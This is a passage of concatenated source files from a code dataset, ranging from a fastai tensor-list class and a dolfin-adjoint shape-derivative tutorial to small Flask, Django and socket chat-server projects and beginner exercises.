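        # copy_new lists the attributes that fastai copies onto any ItemList derived\n        # from this one (e.g. after splitting or labelling); registering 'tfms' here\n        # keeps the transforms attached to those derived lists.\n        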
self.copy_new.append('tfms')\n\n def get(self, i):\n item = super().get(i)\n if self.mask is None: return TensorItem(to2dtensor(item))\n else: return[TensorItem(to2dtensor(item[m])) for m in self.mask]\n\n\n def show_xys(self, xs, ys, figsize=(10, 10), **kwargs):\n \"Show the `xs` and `ys` on a figure of `figsize`. `kwargs` are passed to the show method.\"\n rows = int(math.sqrt(len(xs)))\n fig, axs = plt.subplots(rows, rows, figsize=figsize)\n for x, y, ax in zip(xs, ys, axs.flatten()):\n with np.printoptions(precision=3, suppress=True): #print only 3 decimals in title\n x.show(ax=ax, title=str(y), **kwargs)\n # plt.tight_layout()\n plt.show()\n\n def show_xyzs(self, xs, ys, zs, figsize=(10, 10), **kwargs):\n if self._square_show_res:\n rows = int(np.ceil(math.sqrt(len(xs))))\n fig, axs = plt.subplots(\n rows,\n rows,\n figsize=figsize)\n for x, y, z, ax in zip(xs, ys, zs, axs.flatten()):\n x.show(ax=ax, title=f'{str(y)}\\n{str(z)}', **kwargs)\n else:\n fig, axs = plt.subplots(\n len(xs),\n 2,\n figsize=figsize)\n for i, (x, y, z) in enumerate(zip(xs, ys, zs)):\n x.show(ax=axs[i, 0], title=str(y), **kwargs)\n ##TODO replace this curve with the computed one from pvlib\n x.show(ax=axs[i, 1], title=str(z), **kwargs)\n # plt.tight_layout()\n plt.show()\n\n @classmethod\n def from_array(cls, ts, **kwargs):\n return cls(ts)\n\n @classmethod\n def from_df(cls, df, path='.', cols=None, feat=None, processor=None, **kwargs) -> 'ItemList':\n \"Create an `ItemList` in `path` from the inputs in the `cols` of `df`.\"\n if cols is 0:\n inputs = df\n else:\n col_idxs = df_names_to_idx(list(cols), df)\n inputs = df.iloc[:, col_idxs]\n assert inputs.isna().sum().sum() == 0, f\"NaN values in column(s) {cols} of your dataframe, fix it.\"\n inputs = df2array(inputs, feat)\n res = cls(\n items=inputs,\n path=path,\n inner_df=df,\n processor=processor,\n **kwargs)\n return res\n\ndef tensor_lists_from_arrays(X_train, y_train, X_valid, y_valid, label_cls=FloatList):\n src = ItemLists('.', TensorList(X_train), TensorList(X_valid))\n return src.label_from_lists(y_train, y_valid, label_cls=FloatList)","repo_name":"tcapelle/tabular_image_models","sub_path":"cape_core/tensordata.py","file_name":"tensordata.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25570391396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# .. _tube-shape-derivative-example:\n#\n# .. py:currentmodule:: dolfin_adjoint\n#\n# Tube shape-derivatives\n# ======================\n#\n# .. sectionauthor:: Simon W. Funke , Jørgen Dokken , Stephan Schmidt \n#\n# This example demonstrates how to compute shape-derivatives in morphing domains (including tube shape-derivatives)\n# using dolfin-adjoint.\n\n# Problem definition\n# ******************\n#\n# We consider the problem of computing the sensitivity of the goal functional $J$\n#\n# .. 
math::\n#    \\min_{u, \\Omega(t), t<T} J \\quad \\textrm{with} \\quad J^n = J^{n-1} + \\frac{1}{2} \\Delta t (\\left<\\nabla u^n, \\nabla u^n\\right>_\\Omega + \\left<\\nabla u^{n-1}, \\nabla u^{n-1}\\right>_\\Omega),\n#\n# where the super-scripts denote the timelevels.\n#\n# In code, this becomes:\n\ns = TrialFunction(V)\nz = TestFunction(V)\nS = Function(V)\nX = SpatialCoordinate(mesh)\nrot = lambda y: 2*pi*omega*as_vector((y[1], -y[0]))\nF_s = lambda thn: inner(thn, z)*dx\\\n    - dt*0.5*inner(rot(X+thn)+rot(X), z)*dx\n\n# In the time-loop, the solution :math:`S^n` will be used to update the mesh coordinates for the next time-level.\n#\n# Next, we derive the standard weak variational form for the diffusion-convection equation.\n# We integrate the diffusion and advection terms by parts in order to weakly enforce the\n# boundary conditions on the outer circle. This yields: Find :math:`u` such that for all test\n# functions :math:`v`\n#\n# .. math::\n#    \\left<u_t, v\\right>_\\Omega + k \\left<\\nabla (u), \\nabla (v)\\right>_\\Omega + \\left<u X_t, \\nabla (v)\\right>_{\\Omega} = 0\n#\n# Discretising this equation in time using a Crank-Nicolson scheme yields the fully discretised problem:\n# Find :math:`u^n` such that for all test\n# functions :math:`v`\n#\n# .. math::\n\n#    F_u(u^n, u^{n-1}, S^n;v) =&\\ \\frac{1}{\\Delta t}\\left<u^n - u^{n-1}, v\\right>_\\Omega \\\\\n#    &\\ + k \\left<\\nabla u^{n+1/2}, \\nabla v\\right>_\\Omega \\\\\n#    &\\ + \\left<u^{n+1/2} X_t^{n+1/2}, \\nabla v\\right>_{\\Omega}\n#    =&\\ 0\n#\n# where the super-scripts denote the timelevel and the intermediate timelevels are defined as :math:`u^{n+1/2}:=\\frac{1}{2} u^n + \\frac{1}{2} u^{n-1}` and\n# the mesh morphing velocity :math:`X_t` at the intermediate timestep is approximated as :math:`X_t^{n+1/2}=\\frac{1}{2} X_t^n + \\frac{1}{2} X_t^{n-1} \\approx \\frac{1}{2\\Delta t} S^n + \\frac{1}{2} rot(X)`.\n#\n# In code, this becomes:\n\nu0 = Function(W)\nu1 = Function(W)\nv = TestFunction(W)\nw = TrialFunction(W)\nF_u = lambda V: (1.0/dt*(w-u0)*v*dx\n     + k*inner(grad(v),Constant(1/2)*(grad(w)+grad(u0)))*dx\n     + inner(Constant(1/2)*(w+u0)*V, grad(v))*dx)\n\n# Next, we define the Dirichlet boundary condition on the inner circle. The inner boundary edges are already marked\n# in the mesh, so this is achieved with:\n\nbc = DirichletBC(W, Constant(1.0), bdy_markers, 2)\n\n\n# Next, we define the set of deformation functions.\n# These functions will store the mesh coordinate changes\n# from one timestep to the next and will be solved\n# using the mesh deformation PDE above. Hence,\n# we need as many deformation functions as there are\n# timesteps in the model (N). Later, we compute the derivative with respect\n# to these variables with dolfin-adjoint.\n\nthetas = [Function(V) for i in range(N+1)]\n\n# The mesh movement per time-step is decomposed into a static component (mesh rotation) and a dynamic component (the control variables in thetas).\n# We create a function which contains the total movement per time-step, and assign the first control variable to it, assuming that the system starts from a static position.\n\nS_tot = [Function(V) for i in range(N+1)]\nS_tot[0].assign(thetas[0])\n\n# Now we can implement the timeloop. It consists of four main steps:\n#\n# 1. Solve the mesh deformation PDE to compute the changes in mesh coordinates during the time-step, and add the control variable to the movement;\n# 2. Update the mesh coordinates (using `ALE.move`);\n# 3. Solve the advection-diffusion PDE;\n# 4. 
Compute the contribution to the objective functional.\n#\n# The code is as follows:\n\nALE.move(mesh, S_tot[0])\n\nfor i in range(N):\n print(\"t=%.2f\"%(float(i*dt)))\n\n # Solve for the fixed mesh displacement and assign this movement\n # summed with the control movement to the movement vector\n a, L = system(F_s(s))\n solve(a==L, S)\n S_tot[i+1].assign(S + thetas[i+1])\n\n # Move mesh\n ALE.move(mesh, S_tot[i+1])\n\n\n # Solve for state\n a, L = system(F_u(0.5/dt*(S_tot[i]+S_tot[i+1])))\n solve(a==L, u1, bc)\n u0.assign(u1)\n fout << u1\n\n # Compute functional\n J += assemble(dt*inner(grad(u1), grad(u1))*dx)\n\n# This concludes the forward model, and we can now focus on computing the shape derivatives.\n# As a first step, we define the control variables and the reduced functional. The control\n# variables are the mesh deformation functions for all timesteps:\n\nS_ctrls = thetas\nctrls = [Control(s) for s in S_ctrls]\nJhat = ReducedFunctional(J, ctrls)\n\n# Now, we can run a Taylor test to verify the correctness of the shape derivatives and shape Hessian that dolfin-adjoint\n# computes. The Taylor test performs a Taylor expansion in a user-specified perturbation direction.\n# Since we have N control functions, we also need to specify N perturbation directions:\n\n\nperbs = [project(0.01*Expression([\"1-x[0]*x[0]-x[1]*x[1]\", \"1-x[0]*x[0]-x[1]*x[1]\"], degree=2), V) for _ in ctrls]\nconv = taylor_to_dict(Jhat, S_ctrls, perbs)\npprint(conv)\n\n# Finally, we store the shape derivative for visualisation:\n\ndJdm = Jhat.derivative()\nmesh.coordinates()[:] = original_mesh.data()\n\noutput = File(\"output/dJdOmega.pvd\")\nout = Function(V)\nfor s, dj in zip(S_tot, dJdm):\n ALE.move(mesh, s)\n out.assign(dj)\n output << out\n\n\n# The example code can be found in ``examples/tube-shape-derivative`` in\n# the ``dolfin-adjoint`` source tree, and executed as follows:\n#\n#\n# .. 
code-block:: bash\n#\n# $ python tube-shape-derivative.py\n#\n# ...\n# {'R0': {'Rate': [0.99233621799267857, 0.9961586867939265,\n# 0.99807699260441085],\n# 'Residual': [0.5980325614382096,\n# 0.3006089201505162,\n# 0.15070519330050303,\n# 0.07545310314151976]},\n# 'R1': {'Rate': [1.99381570097023, 1.996905781695665, 1.9984531246419335],\n# 'Residual': [0.00639804263023247,\n# 0.0016063818837048216,\n# 0.0004024577166074905,\n# 0.00010072236703549675]},\n# 'R2': {'Rate': [2.9965354427868878, 2.998667114984213,\n# 2.9994355259119714],\n# 'Residual': [5.510229348307336e-05,\n# 6.904347224064239e-06,\n# 8.638411247309367e-07,\n# 1.0802239755861346e-07]},\n# 'eps': [0.01, 0.005, 0.0025, 0.00125]}\n\n\n# The output shows the expected convergence rate for the finite difference (FD) test, first order adjoint test (dJdm),\n# and second order adjoint test.\n","repo_name":"dolfin-adjoint/pyadjoint","sub_path":"examples/tube-shape-derivative/tube-shape-derivative.py","file_name":"tube-shape-derivative.py","file_ext":"py","file_size_in_byte":10308,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"72"} +{"seq_id":"14524285686","text":"#Implemente um programa em Python em que o usuário entre com a idade de várias \n#pessoas em anos e imprimir: \n#- total de pessoas com menos de 18 anos; \n#- total de pessoas com mais de 60 anos;\n#- para finalizar o programa, deve-se entrar com idade igual a 0 (zero).\nx= 1\nop= 1\nmaior= 0\nmenor= 0\n\nwhile op != 0:\n \n op=int(input(\"\\n(1) Para digitar o nome de uma pessoa\\n(0) Para sair:\\n\"))\n\n if op == 0:\n break\n elif op == 1:\n name=input(\"\\nNome da %dº pessoa:\\n\" % x)\n idade=int(input(\"\\nIdade: \"))\n if idade < 18:\n menor= menor + 1\n elif idade > 60:\n maior= maior + 1\n x= x+1\n\n elif op != 0 and op != 1:\n print(\"\\nOpção inválida\")\n \nprint(\"\\nQuantidade de pessoas com menos de 18 anos: %d\" % menor, \"\\n\")\nprint(\"\\nQuantidade de pessoas com mais de 60 anos: %d\" % maior, \"\\n\")\n\n\n ","repo_name":"Peterson-Paganelli/Faculdade_old","sub_path":"Avaliacao3.py","file_name":"Avaliacao3.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38282516325","text":"# import nltk\n# nltk.download('popular')\n# from nltk.stem import WordNetLemmatizer\n# lemmatizer = WordNetLemmatizer()\n# import pickle\n# import numpy as np\n\n# from keras.models import load_model\n# model = load_model('model.h5')\n# import json\n# import random\n# intents = json.loads(open('data.json').read())\n# words = pickle.load(open('texts.pkl','rb'))\n# classes = pickle.load(open('labels.pkl','rb'))\n\n# def clean_up_sentence(sentence):\n# # tokenize the pattern - split words into array\n# sentence_words = nltk.word_tokenize(sentence)\n# # stem each word - create short form for word\n# sentence_words = [lemmatizer.lemmatize(word.lower()) for word in sentence_words]\n# return sentence_words\n\n# # return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\n\n# def bow(sentence, words, show_details=True):\n# # tokenize the pattern\n# sentence_words = clean_up_sentence(sentence)\n# # bag of words - matrix of N words, vocabulary matrix\n# bag = [0]*len(words) \n# for s in sentence_words:\n# for i,w in enumerate(words):\n# if w == s: \n# # assign 1 if current word is in the vocabulary position\n# bag[i] = 1\n# if show_details:\n# print (\"found in bag: %s\" % w)\n# return(np.array(bag))\n\n# def 
predict_class(sentence, model):\n# # filter out predictions below a threshold\n# p = bow(sentence, words,show_details=False)\n# res = model.predict(np.array([p]))[0]\n# ERROR_THRESHOLD = 0.25\n# results = [[i,r] for i,r in enumerate(res) if r>ERROR_THRESHOLD]\n# # sort by strength of probability\n# results.sort(key=lambda x: x[1], reverse=True)\n# return_list = []\n# for r in results:\n# return_list.append({\"intent\": classes[r[0]], \"probability\": str(r[1])})\n# return return_list\n\n# def getResponse(ints, intents_json):\n# tag = ints[0]['intent']\n# list_of_intents = intents_json['intents']\n# for i in list_of_intents:\n# if(i['tag']== tag):\n# result = random.choice(i['responses'])\n# break\n# return result\n\n# def chatbot_response(msg):\n# ints = predict_class(msg, model)\n# res = getResponse(ints, intents)\n# return res\n\n\nfrom flask import Flask, render_template, request, jsonify\nimport database.utils as db\n\napp = Flask(__name__)\napp.static_folder = 'static'\n\n# @app.route(\"/get\")\n# def get_bot_response():\n# userText = request.args.get('msg')\n# return chatbot_response(userText)\n\n@app.route(\"/school\", methods = [\"GET\"])\ndef getSchoolInfo():\n data = db.school()\n return jsonify(\n {\n \"id\": data[0],\n \"name\": data[1],\n \"description\": data[2],\n \"thanhPho\": data[3],\n \"quan\": data[4],\n \"duong\": data[5],\n \"image\": data[6]\n }\n )\n\n@app.route(\"/job\", methods=[\"GET\"])\ndef getJobInfo():\n data = db.get_job_data()\n \n # Check if there is any data\n if not data:\n return jsonify({\"message\": \"No job data found\"}), 404\n\n # List to store information for all jobs\n job_list = []\n\n # Iterate through each job in data\n for job in data:\n job_info = {\n \"id\": job[0],\n \"name\": job[1],\n \"salary\": job[2],\n \"status\": job[3],\n \"description\": job[4]\n }\n job_list.append(job_info)\n\n return jsonify({\"jobs\":job_list})\n\n@app.route(\"/scholarship\", methods=[\"GET\"])\ndef get_all_scholarship_info():\n data = db.get_scholarship_data()\n \n # Check if there is any data\n if not data:\n return jsonify({\"message\": \"No scholarship data found\"}), 404\n\n # List to store information for all scholarships\n scholarship_list = []\n\n # Iterate through each scholarship in data\n for scholarship in data:\n scholarship_info = {\n \"id\": scholarship[0],\n \"loaiHb\": scholarship[1],\n \"diemYc\": scholarship[2],\n \"hanhKiemYc\": scholarship[3]\n }\n scholarship_list.append(scholarship_info)\n\n return jsonify({\"scholarships\":scholarship_list})\n\n@app.route(\"/tuition\", methods=[\"GET\"])\ndef get_tuition_info():\n data = db.get_tuition_data()\n \n # Check if there is any data\n if not data:\n return jsonify({\"message\": \"No tuition data found\"}), 404\n\n # List to store information for all tuitions\n tuition_list = []\n\n # Iterate through each tuition in data\n for tuition in data:\n tuition_info = {\n \"id\": tuition[0],\n \"soTien\": tuition[1],\n \"namHoc\": tuition[2]\n }\n tuition_list.append(tuition_info)\n\n return jsonify({\"tuitions\":tuition_list})\n\n@app.route(\"/target\", methods=[\"GET\"])\ndef get_target_info():\n data = db.get_target_data()\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": \"No target data found\"}), 404\n\n # List để lưu thông tin cho tất cả các chỉ tiêu\n target_list = []\n\n # Duyệt qua mỗi chỉ tiêu trong dữ liệu\n for target in data:\n target_info = {\n \"id\": target[0],\n \"nam\": target[1],\n \"soLuong\": target[2],\n \"phuongThuc\": target[3]\n }\n 
target_list.append(target_info)\n\n return jsonify({\"targets\":target_list})\n\n@app.route(\"/major\", methods=[\"GET\"])\ndef get_major_info():\n data = db.get_major_data()\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": \"No major data found\"}), 404\n\n # List để lưu thông tin cho tất cả các ngành học\n major_list = []\n\n # Duyệt qua mỗi ngành học trong dữ liệu\n for major in data:\n major_info = {\n \"id\": major[0],\n \"tenNganh\": major[1],\n \"maNganh\": major[2],\n \"moTa\": major[3],\n \"soTin\": major[4],\n \"coSo\": major[5]\n }\n major_list.append(major_info)\n\n return jsonify({\"majors\":major_list})\n\n@app.route(\"/news\", methods=[\"GET\"])\ndef get_news_info():\n data = db.get_news_data()\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": \"No news data found\"}), 404\n\n # List để lưu thông tin cho tất cả các tin tức\n news_list = []\n\n # Duyệt qua mỗi tin tức trong dữ liệu\n for news in data:\n news_info = {\n \"id\": news[0],\n \"title\": news[1],\n \"image\": news[2],\n \"fullDescription\": news[3],\n \"time\": news[4],\n \"shortDescription\": news[5]\n }\n news_list.append(news_info)\n\n return jsonify( {\"news\":news_list})\n\n@app.route(\"/news/detail\", methods=[\"GET\"])\ndef get_news_detail_info():\n news_id = request.args.get(\"id\")\n data = db.get_news_detail(news_id)\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": f\"No news found with ID {news_id}\"}), 404\n\n # Chuẩn bị thông tin chi tiết\n news_detail = {\n \"id\": data[0],\n \"title\": data[1],\n \"image\": data[2],\n \"fullDescription\": data[3],\n \"time\": data[4],\n \"shortDescription\": data[5]\n }\n\n return jsonify(news_detail)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5001)","repo_name":"lenhathuy9281/TuVanTuyenSinhPTIT_server","sub_path":"server_chat.py","file_name":"server_chat.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1296479600","text":"\nclass Solution:\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n start, end = 0, 0\n\n for i in range(len(s)):\n len1 = self.expandAroundCenter(s, i, i)\n len2 = self.expandAroundCenter(s, i, i+1)\n\n length = max(len1, len2)\n if length > (end - start):\n start = i - int((length - 1) / 2)\n end = i + int(length / 2)\n\n return s[start:end+1]\n\n\n def expandAroundCenter(self, s, left, right):\n L, R = left, right\n while (L >= 0) and (R < len(s)) and s[L] == s[R]:\n L -= 1\n R += 1\n\n return R - L - 1\n\ndef stringToString(input):\n import json\n\n return json.loads(input)\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n s = stringToString(line)\n\n ret = Solution().longestPalindrome(s)\n\n out = (ret)\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()","repo_name":"samguns/leetcode","sub_path":"005-LongestPalindromicSubstring/python/lps.py","file_name":"lps.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36055390100","text":"from coupler import *\n\norigin=(0,0)\nwidth = 1.3\ngap=3\nbend=20\ndx = 0.45\nradius_disk=40\n\np=(gap+width)*0.5\ncell = 
gp.Cell('test')\ncell.add(coupler(origin,width,np.pi*0.25,10,0.8,1.2,gap))\ncell.add(coupler((250,0),width,np.pi*0.25,10,0.8,1.2,gap))\n\npath1=gp.Path(gap, (origin[0]+p,origin[1]))\npath1.arc(bend-p,np.pi,np.pi*0.5).segment(210).arc(bend-p,np.pi*0.5,0)\ncell.add(path1)\n\npath2=gp.Path(gap, (origin[0]-p,origin[1]))\npath2.arc(bend+p,np.pi,np.pi*0.5).segment(210).arc(bend+p,np.pi*0.5,0)\n\norigin_disk=(origin[0]+125, origin[1]+dx+width*0.5+radius_disk+bend)\npath2=gp.fast_boolean(path2,gp.Round(origin_disk,radius_disk),'not')\ncell.add(path2)\n\nring=gp.Round(\n    origin_disk,\n    radius_disk+gap,\n    inner_radius=radius_disk),\n\ncell.add(gp.fast_boolean(\n\tring,\n\tgp.Path(width+2*gap,\n\t\t(origin[0]+125-100,origin[1]+bend)).segment(2*100),\n\t'not'))\n\n# gp.LayoutViewer()\ngp.gds_print('disk.gds', unit=1.0e-6, precision=1.0e-9)\n","repo_name":"dboriska/pypic","sub_path":"positive/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73951204394","text":"a = int(input())\r\nli = []     # list of the entered OX strings\r\nresultLi = []   # list holding the computed score for each problem\r\n\r\n# input value list\r\nfor _ in range(a):\r\n    li.append(str(input()))\r\n\r\nfor i in range(len(li)):\r\n    score = 0\r\n    result = 0\r\n    for j in range(len(li[i])):\r\n        if li[i][j] == \"O\":\r\n            score += 1\r\n            result += score\r\n        else:\r\n            score = 0\r\n    resultLi.append(result)\r\n    print(resultLi[i])","repo_name":"choihyerln/Baekjoon","sub_path":"백준/Bronze/8958. OX퀴즈/OX퀴즈.py","file_name":"OX퀴즈.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"5154625639","text":"import os\nimport collections\nimport json\n\ndata = collections.OrderedDict()\n\ndata[\"Name\"] = ''\ndata[\"Description\"] = ''\ndata[\"BIDSVersion\"] = '1.0.0rc3'\ndata[\"License\"] = ''\ndata[\"Authors\"] = ['']\ndata[\"Funding\"] = ''\ndata[\"ReferencesAndLinks\"] = ['']\ndata['HowToAcknowledge'] = ''\ndata['DatasetDOI'] = ''\n\nbids_dir = ''\nproject_subject_label = ''\ndataset_json_folder = bids_dir + project_subject_label\ndataset_json_name = dataset_json_folder + '/' + 'dataset_description.json'\n\nwith open(dataset_json_name, 'w') as ff:\n    json.dump(data, ff, sort_keys=False, indent=4)\n","repo_name":"daelsaid/fmri_processing_workflows","sub_path":"bids_templates/dataset_description_template.py","file_name":"dataset_description_template.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"69896333354","text":"# apps/core/urls.py\n\n# Django modules\nfrom django.urls import path\n\n# Locals\nfrom apps.core import views\n\napp_name = 'core'\n\nurlpatterns = [\n    path('', views.frontpage, name='frontpage'),\n    path('contact/', views.contact, name='contact'),\n]","repo_name":"gurnitha/2022-django-multi-vendor-ytb-codewithstein","sub_path":"apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"30826570786","text":"import torch\nimport csv\nimport numpy as np\n\nres = dict()\nwith open('/home/filou/Downloads/activ.csv') as csv_file:\n    rows = csv.reader(csv_file, delimiter=',')\n    next(rows, None)\n    for row in rows:\n        if (\"Waiting\" in row[5]\n            or not(row[3])\n            or row[3] == \"0\"):\n            continue\n        win = 1 if \"Won\" in row[5] else 0\n        criterion = 
row[0]\n        if not(criterion in res):\n            res[criterion] = list()\n        res[criterion].append([(float(row[3])-1.0)/4, win])\n\nprint(res)\nres['test 1'] = [ [1, 0], [1, 0], [1, 1], [1, 1], [0, 1], [0, 1], [0, 0], [0, 0]]\nres['test 2'] = [ [1, 0], [0, 1], [1, 0], [0, 1] ]\nres['test 3'] = [ [1, 1], [0.75, 1], [0.75, 1], [1, 1], [1, 0], [0.75, 0]]\nsorted_res = []\nfor crit, data in res.items():\n    values = np.array(data)\n    covariance = np.cov(values[:, 0], values[:, 1])[0][1]  # cross-covariance of criterion value and win\n    correlation = np.corrcoef(values[:, 0], values[:, 1])[0][1]\n    corr_bis = covariance / np.sqrt(np.var(values[:, 0]) * np.var(values[:, 1]))\n    sorted_res.append([correlation, crit])\n    print(f\"{correlation:.2}, {crit}\")\n\nfor item in sorted(sorted_res, key=lambda x: x[0], reverse=True):\n    # print(f\"{item[0]:.2}\")\n    print(f\"{item[1]}\")\n    # print(f\"{item[0]:.2}, {item[1]}\")\n    \n","repo_name":"philipperolet/tensor","sub_path":"variance.py","file_name":"variance.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23621967814","text":"from django import template\r\nfrom users.models import Profile\r\n\r\nregister = template.Library()\r\n\r\n@register.filter(name='is_liked_by_user')\r\ndef is_liked_by_user(post, user):\r\n    return post.is_liked_by_user(user)\r\n\r\n@register.filter(name='is_following')\r\ndef is_following(profile_user, current_user):\r\n    try:\r\n        profile = Profile.objects.get(user=current_user)\r\n        return profile.following.filter(user=profile_user).exists()\r\n    except Profile.DoesNotExist:\r\n        return False\r\n","repo_name":"raushannerkar/social_media","sub_path":"posts/templatetags/customfilters.py","file_name":"customfilters.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13972373094","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import timezone\nfrom .models import Book, Author\nfrom .forms import ReviewForm\n\ndef books_list(request):\n    books = Book.objects.order_by('title')\n    return render(request, 'books/book_list.html', {'books': books})\n\ndef books_detail(request, pk):\n    book = get_object_or_404(Book, pk=pk)\n    return render(request, 'books/book_detail.html', {'book': book})\n\ndef author_detail(request, pk):\n    author = get_object_or_404(Author, pk=pk)\n    return render(request, 'books/author_detail.html', {'author': author})\n\ndef add_review(request, pk):\n    book = get_object_or_404(Book, pk=pk)\n    if request.method == \"POST\":\n        form = ReviewForm(request.POST)\n        if form.is_valid():\n            review = form.save(commit=False)\n            review.book = book\n            review.published_date = timezone.now()\n            review.save()\n            return redirect('book_detail', pk=book.pk)\n    else:\n        form = ReviewForm()\n    return render(request, 'books/add_review.html', {'form': form})\n    \n    \n","repo_name":"lauosi/library-django","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38294085926","text":"import socket\nimport sys\nimport threading\n\n\ndef read_msg(clients, friends, sock_cli, addr_cli, src_username):\n    # Receive messages from this client\n    while True:\n        data = sock_cli.recv(65535)\n        if len(data) == 0:\n            break\n\n        # Parse the message\n        dest, msg = data.split(b\"|\", 1)\n        dest = dest.decode(\"utf-8\")\n\n        # Route the message to the right clients\n        # Send the message to every client\n        if dest == \"bcast\":\n            msg = msg.decode(\"utf-8\")\n            msg2 = \"<{}>: {}\".format(src_username, msg)\n            send_broadcast(clients, msg2, addr_cli)\n\n        # Add a friend\n        elif dest == \"addfriend\":\n            dest_username = msg.decode(\"utf-8\")\n            friends[src_username].append(dest_username)\n            friends[dest_username].append(src_username)\n            send_msg(clients[dest_username][0], f\"{src_username} is now friend\")\n            send_msg(clients[src_username][0], f\"{dest_username} is now friend\")\n\n        # Send the message to all friends\n        elif dest == \"friends\":\n            msg = msg.decode(\"utf-8\")\n            msg2 = \"<{}>: {}\".format(src_username, msg)\n            send_friends(clients, friends, src_username, msg2, addr_cli)\n        \n        # Send a file\n        elif dest == \"sendfile\":\n            dest_username, filename, size, filedata = msg.split(b'|', 3)\n            dest_username = dest_username.decode(\"utf-8\")\n            filename = filename.decode(\"utf-8\")\n            size = int(size.decode(\"utf-8\"))\n\n            while len(filedata) < size:\n                if size-len(filedata) > 65536:\n                    filedata += sock_cli.recv(65536)\n                else:\n                    filedata += sock_cli.recv(size - len(filedata))\n                    break\n            dest_sock_cli = clients[dest_username][0]\n            if dest_sock_cli is not None:\n                send_file(dest_sock_cli, filename, size, filedata, src_username)\n        \n        # Send a private message\n        else:\n            msg = msg.decode(\"utf-8\")\n            msg2 = \"<{}>: {}\".format(src_username, msg)\n            dest_sock_cli = clients[dest][0]\n            send_msg(dest_sock_cli, msg2)\n\n    # Disconnect the client and remove it from the client list\n    sock_cli.close()\n    print(\"connection closed\", addr_cli)\n    del clients[\"{}:{}\".format(addr_cli[0], addr_cli[1])]\n\n# send_broadcast (to every client)\ndef send_broadcast(clients, data, sender_addr_cli):\n    for sock_cli, addr_cli, _ in clients.values():\n        if not (addr_cli[0] == sender_addr_cli[0] and addr_cli[1] == sender_addr_cli[1]):\n            send_msg(sock_cli, data)\n\n# send_msg (message to one specific client)\ndef send_msg(sock_cli, data):\n    message = f'message|{data}'\n    sock_cli.send(bytes(message, \"utf-8\"))\n\n# send_friends (to all friends)\ndef send_friends(clients, friends, src_username, data, sender_addr_cli):\n    cur_friends = friends[src_username]\n    for cur_friend in cur_friends:\n        if cur_friend not in clients:\n            continue\n        sock_cli, addr_cli, _ = clients[cur_friend]\n        if not (sender_addr_cli[0] == addr_cli[0] and sender_addr_cli[1] == addr_cli[1]):\n            send_msg(sock_cli, data)\n\n# send_file (send a file)\ndef send_file(sock_cli, filename, size, filedata, username):\n    file = f'file|{username}|{filename}|{size}|'.encode('utf-8')\n    file += filedata\n    sock_cli.sendall(file)\n\n\n# Server socket object\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Bind the server to a specific IP and port\nserver_socket.bind(('0.0.0.0', 6666))\n\n# Start listening\nserver_socket.listen(5)\n\n# Dictionaries for clients and friends\nclients = {}\nfriends = {}\n\ntry:\n    while True:\n        sock_cli, addr_cli = server_socket.accept()\n\n        # Receive the username from the client\n        src_username = sock_cli.recv(65535).decode(\"utf-8\")\n        print(\" {} successfully joined\".format(src_username))\n\n        # Create a thread\n        thread_cli = threading.Thread(target=read_msg, args=(clients, friends, sock_cli, addr_cli, src_username))\n        thread_cli.start()\n\n        # Add the new client to the dictionaries\n        clients[src_username] = (sock_cli, addr_cli, thread_cli)\n        friends[src_username] = []\n\nexcept KeyboardInterrupt:\n    # Close the server socket\n    server_socket.close()\n    
